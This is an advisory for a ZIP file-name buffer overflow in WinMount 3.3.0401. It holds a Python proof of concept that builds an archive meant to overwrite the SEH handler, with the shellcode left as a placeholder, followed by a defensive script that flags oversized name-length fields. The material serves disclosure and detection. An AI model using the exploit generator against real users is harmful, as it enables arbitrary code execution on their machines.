WinMount 3.3.0401 ZIP File Parsing Remote Overflow Vulnerability

Source: 岁月联盟 Editor: 猪蛋儿 Date: 2010-04-28

Affected versions:
WinMount 3.3.0401

Vulnerability description:
BUGTRAQ ID: 39557

WinMount is a free Windows utility that can compress, decompress and browse archives, and mount DVD, CD and virtual machine disk images.

A user who is tricked into opening a zip file containing an overly long file name with WinMount can trigger a buffer overflow, leading to arbitrary code execution.

<*Reference

Lufeng Li (lilf@neusoft.com)
http://marc.info/?l=bugtraq&m=127170296402601&w=2

*>

Test method:

PoC:
import os

sploitfile = "test.zip"
# Local file header (PK\x03\x04); the name length field is set to 0xffd0
ldf_header = ('\x50\x4B\x03\x04\x14\x00\x00'
              '\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00'
              '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
              '\xd0\xff'
              '\x00\x00\x00')
# Central directory file header (PK\x01\x02) carrying the same name length
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"
              "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
              "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
              "\xd0\xff"
              "\x00\x00\x00\x00\x00\x00\x01\x00"
              "\x24\x00\x00\x00\x00\x00\x00\x00")
# End of central directory record (PK\x05\x06)
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"
                 "\x00\x01\x00\x01\x00"
                 "\xfe\xff\x00\x00"
                 "\xee\xff\x00\x00"
                 "\x00\x00")
print "[+] Preparing payload\n"
size = 65484
junk = 'A' * 420
nseh = '\x89\x8a\x8b\x8c'
seh = '\x84\x5b\xac\x8d'
junk_ = 'A' * 33
jumpto = '\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'  # make eax point to shellcode and jump to shellcode
shellcode = ("the shellcode here will be changed into unicode")  # encode by alpha2
junk__ = 'B' * 80
last = 'C' * (size - 420 - len(nseh + seh + junk_ + jumpto + junk__ + shellcode))
# The over-long "file name" is the whole payload; it ends in .wav
payload = junk + nseh + seh + junk_ + jumpto + junk__ + shellcode + last + ".wav"
evilzip = ldf_header + payload + cdf_header + payload + eofcdf_header
print "[+] Removing old zip file\n"
if os.path.exists(sploitfile):
    os.remove(sploitfile)
print "[+] Writing payload to file\n"
fobj = open(sploitfile, "wb")  # binary mode so no newline translation happens
fobj.write(evilzip)
print "generate zip file " + sploitfile
fobj.close()
print '[+] Wrote %d bytes to file %s\n' % (len(evilzip), sploitfile)
print "[+] Payload length :%d \n" % (len(payload))


--------------
lilf
2010-04-17
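The field the PoC abuses, a local-header name length of 0xffd0 for an entry that holds no real name, can be spotted before an archive is ever handed to a parser. The triage script below is an added example and is not part of this advisory or of the original PoC; the 1024-byte threshold, the function names and the two constructed sample archives are assumptions made here.

```python
import io
import struct
import zipfile

LFH_SIG = b"PK\x03\x04"
LFH_FMT = "<4sHHHHHIIIHH"  # 30-byte local file header, little-endian
MAX_SANE_NAME_LEN = 1024   # triage threshold; an assumption, not a value from the advisory


def scan_local_headers(data, max_name_len=MAX_SANE_NAME_LEN):
    """Walk the local file headers of a ZIP blob and report oversized file names.

    Returns a list of (header_offset, declared_name_len, reason). A declared name
    length far beyond any real file name, or running past the end of the data,
    is the shape of input the advisory describes.
    """
    findings = []
    pos = data.find(LFH_SIG)
    while pos != -1 and pos + 30 <= len(data):
        (_sig, _ver, _flags, _method, _mtime, _mdate, _crc,
         csize, _usize, name_len, extra_len) = struct.unpack_from(LFH_FMT, data, pos)
        if name_len > max_name_len:
            findings.append((pos, name_len, "name length %d exceeds %d" % (name_len, max_name_len)))
        elif pos + 30 + name_len > len(data):
            findings.append((pos, name_len, "name length runs past end of data"))
        # Skip header, name, extra field and declared compressed data, then look
        # for the next local header signature.
        pos = data.find(LFH_SIG, pos + 30 + name_len + extra_len + csize)
    return findings


def build_benign_zip():
    """Constructed sample: a normal archive with one short-named entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("sound.wav", b"RIFF" + b"\x00" * 60)
    return buf.getvalue()


def build_oversized_name_zip(name_len=0xFFD0):
    """Constructed sample: a local header whose name length field carries the
    0xffd0 value seen in the PoC, followed by filler instead of a real name."""
    header = struct.pack(LFH_FMT, LFH_SIG, 20, 0, 8, 0xACB7, 0x34CE, 0, 0, 0, name_len, 0)
    return header + b"A" * 200
```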

Security advice:
Vendor patch:

WinMount
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://www.winmount.com/